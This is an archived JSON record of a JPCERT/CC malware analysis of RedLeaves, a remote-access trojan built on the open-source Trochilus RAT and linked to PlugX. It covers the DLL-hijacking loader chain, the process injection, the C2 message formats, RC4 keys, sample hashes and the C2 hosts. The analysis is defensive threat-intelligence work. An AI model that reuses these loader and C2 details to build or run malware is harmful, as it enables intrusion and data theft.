{
	"id": "604b2cc1-eb35-4b22-9ca0-99bd7182828c",
	"created_at": "2026-04-06T00:16:13.952181Z",
	"updated_at": "2026-04-10T03:30:11.945042Z",
	"deleted_at": null,
	"sha1_hash": "dbb37b1a14f59614ff5764adc6813452847410a0",
	"title": "RedLeaves - Malware Based on Open Source RAT - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 994116,
	"plain_text": "RedLeaves - Malware Based on Open Source RAT - JPCERT/CC\r\nEyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2017-04-02 · Archived: 2026-04-05 20:12:55 UTC\r\nRedLeaves\r\nHi again, this is Shusei Tomonaga from the Analysis Center.\r\nSince around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by\r\nmalware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted\r\nemails.\r\nThis entry introduces details of RedLeaves and results of our analysis including its relation to PlugX, and a tool\r\nwhich is used as the base of this malware.\r\nHow RedLeaves runs\r\nTo have the RedLeaves injected into the process of Internet Explorer, the following steps will be taken (Figure1):\r\nFigure 1: Flow of events until RedLeaves runs\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 1 of 10\n\nMalware samples that JPCERT/CC has analysed create the following three files in %TEMP% folder and execute a\r\nlegitimate application when executed.\r\nA legitimate application (EXE file): a signed, executable file which reads a DLL file located in the same\r\nfolder\r\nA Loader (DLL file): a malicious DLL file which is loaded by the legitimate application\r\nEncoded RedLeaves (DATA file): Encoded data which is read by the loader\r\nWhen the legitimate application is executed, it loads the loader located in the same folder through DLL Hijacking\r\n(DLL preloading).\r\nThe loader, which is loaded in the legitimate application, reads and decodes the encoded RedLeaves and then\r\nexecutes it. The executed RedLeaves launches a process (Internet Explorer) depending on its configuration, and\r\ninjects itself there. Then, RedLeaves starts running in the injected process. The following section explains the\r\nbehaviour of the injected RedLeaves.\r\nBehaviour of RedLeaves\r\nRedLeaves communicates to specific sites by HTTP or its custom protocol and executes commands that are\r\nreceived. Figure 2 is the PE header of the injected RedLeaves. Strings such as “MZ” and “PE” are replaced with\r\n“0xFF 0xFF”.\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 2 of 10\n\nFigure 2: Injected RedLeaves\r\nThe injected RedLeaves connects to command and control (C\u0026C) servers by HTTP POST request or its custom\r\nprotocol. Destination hosts and communication methods are specified in its configuration. Please refer to\r\nAppendix A for more information.\r\nBelow is an example of the HTTP POST request. Table B-1 and B-2 in Appendix B describe the format of the data\r\nsent.\r\nPOST /YJCk8Di/index.php\r\nConnection: Keep-Alive\r\nAccept: */*\r\nContent-Length: 140\r\nHost: 67.205.132.17:443\r\n[Data]\r\nThe data is encrypted with RC4 (the key is stored in its configuration) and contains the following:\r\n__msgid=23.__serial=0.clientid=A58D72524B51AA4DBBB70431BD3DBBE9\r\nThe data received from the C\u0026C servers contain commands. Depending on the received commands, RedLeaves\r\nexecutes the following functions (Please see Table B-3 in Appendix B for the details of received data):\r\nOperation on files\r\nExecute arbitrary shell commands\r\nConfigure communication methods\r\nSend drive information\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 3 of 10\n\nSend system information\r\nUpload/download files\r\nScreen capture\r\nExecute proxy function\r\nBase of RedLeaves’s Code\r\nJPCERT/CC analysed RedLeaves and confirmed that its code has a lot in common with the source code of\r\nTrochilus[1], a type of RAT (Remote Administration Tool), which is available on Github. Figure 3 shows part of\r\nthe code to process received data. It is clear that it processes the same data as listed in Table B-3 in Appendix B.\r\nFigure 3: Part of Trochilus’s source code\r\nIt is presumed that RedLeaves is built on top of Trochilus’s source code, rather than from scratch.\r\nRelation to PlugX\r\nComparing RedLeaves samples that JPCERT/CC has observed with PlugX, used by certain attacker groups in the\r\npast, we identified that similar code is used in some processes. Below are the sequence of instructions observed\r\nwhen the sample creates three files (a legitimate application, a loader and encoded RedLeaves or PlugX).\r\nFigure 4: Comparison of file creation process\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 4 of 10\n\nFurthermore, the process in which the loader decodes the encoded data (encoded RedLeaves or PlugX) is similar.\r\nFigure 5: Comparison of file decode process\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 5 of 10\n\nJPCERT/CC has also confirmed that some of the RedLeaves and PlugX samples that share the above code also\r\ncommunicate with common hosts. From this observation, it is presumed that the attacker group using RedLeaves\r\nmay have used PlugX before.\r\nSummary\r\nRedLeaves is a new type of malware being observed since 2016 in attachments to targeted emails. Attacks using\r\nthis malware may continue.\r\nThe hash values of the samples introduced here are listed in Appendix C. Some of the RedLeaves’ destination\r\nhosts that JPCERT/CC has confirmed are also listed in Appendix D. Please check your devices for any suspicious\r\ncommunication with such hosts.\r\n- Shusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] Trochilus: A fast\u0026free windows remote administration Tool\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 6 of 10\n\nhttps://github.com/5loyd/trochilus\r\nAppendix A: Configuration information\r\nTable A: List of Configuration Information\r\nOffset Description Remarks\r\n0x000 Destination 1  \r\n0x040 Destination 2  \r\n0x080 Destination 3  \r\n0x0C0 Port number  \r\n0x1D0 Communication mode 1=TCP, 2=HTTP, 3=HTTPS, 4=TCP and HTTP\r\n0x1E4 ID  \r\n0x500 Mutex  \r\n0x726 Injection Process  \r\n0x82A RC4 key Used for encrypting communication\r\nRC4 key examples:\r\nLucky123\r\nproblems\r\n20161213\r\njohn1234\r\nminasawa\r\nAppendix B: Communicated data\r\nTable B-1: Format of data sent through HTTP POST request\r\nOffset Length Contents\r\n0x00 4 Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x04 4 Server id (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x08 4 Fixed value\r\n0x0C - Data encrypted with RC4\r\nTable B-2: Format of data sent through its custom protocol\r\nOffset Length Contents\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 7 of 10\n\nOffset Length Contents\r\n0x00 4 Random numerical value\r\n0x04 4 Fixed value\r\n0x08 4 Length\r\n0x0C 4 Length of data encrypted with RC4 (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x10 4 Server id (XOR encoded with the first 4 bytes of the RC4 key)\r\n0x14 4 Fixed value\r\n0x18 - Data encrypted with RC4\r\nTable B-3: Contents in received data\r\nString Type Contents\r\n__msgid Numeric Command\r\n__serial Numeric  \r\n__upt true, etc. Whether the command is executed by a thread\r\n__data data Command parameter, etc.\r\nAppendix C: SHA-256 hash value of the samples\r\nRedLeaves\r\n5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481\r\nPlugX\r\nfcccc611730474775ff1cfd4c60481deef586f01191348b07d7a143d174a07b0\r\nAppendix D: Communication destination host\r\nmailowl.jkub.com\r\nwindowsupdates.itemdb.com\r\nmicrosoftstores.itemdb.com\r\n67.205.132.17\r\n144.168.45.116\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 8 of 10\n\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nRelated articles\r\nUpdate on Attacks by Threat Group APT-C-60\r\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 9 of 10\n\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nDslogdRAT Malware Installed in Ivanti Connect Secure\r\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nhttps://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html"
	],
	"report_names": [
		"redleaves---malware-based-on-open-source-rat.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434573,
	"ts_updated_at": 1775791811,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dbb37b1a14f59614ff5764adc6813452847410a0.pdf",
		"text": "https://archive.orkl.eu/dbb37b1a14f59614ff5764adc6813452847410a0.txt",
		"img": "https://archive.orkl.eu/dbb37b1a14f59614ff5764adc6813452847410a0.jpg"
	}
}